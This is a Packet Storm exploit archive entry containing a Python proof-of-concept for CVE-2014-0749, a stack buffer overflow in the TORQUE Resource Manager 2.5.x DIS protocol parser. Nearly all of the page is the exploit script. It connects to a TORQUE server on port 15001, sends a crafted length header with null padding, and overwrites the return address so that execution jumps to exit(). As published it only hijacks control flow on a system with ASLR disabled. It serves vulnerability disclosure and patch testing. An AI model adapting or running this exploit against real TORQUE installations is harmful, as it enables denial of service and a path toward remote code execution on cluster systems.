Lucene search

K
packetstormBwallPACKETSTORM:126855
HistoryMay 30, 2014 - 12:00 a.m.

TORQUE Resource Manager 2.5.13 Buffer Overflow

2014-05-3000:00:00
bwall
packetstormsecurity.com
29

EPSS

0.432

Percentile

97.4%

`#!/usr/bin/env python  
# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub  
# Date: 27 May 2014  
# Exploit Author: bwall - @botnet_hunter  
# Vulnerability discovered by: MWR Labs  
# CVE: CVE-2014-0749  
# Vendor Homepage: http://www.adaptivecomputing.com/  
# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/  
# Version: 2.5.13  
# Tested on: Manjaro x64  
# Description:  
# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that  
# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the  
# data, the next digits are the actual size of the buffer.  
#  
# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system  
# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be  
# compiled on the target system. The result of this exploit is intended to just point RIP at 'exit()'  
  
import socket  
  
  
ip = "172.16.246.177"  
port = 15001  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((ip, port))  
  
offset = 143  
header = str(len(str(offset))) + str(offset) + '1'  
  
packet = header  
packet += "\x00" * (140 - len(packet))  
packet += ('\xc0\x18\x76\xf7\xff\x7f\x00\x00') # exit() may require a different offset in your build  
  
s.sendall(packet)  
data = s.recv(1024)  
s.close()  
`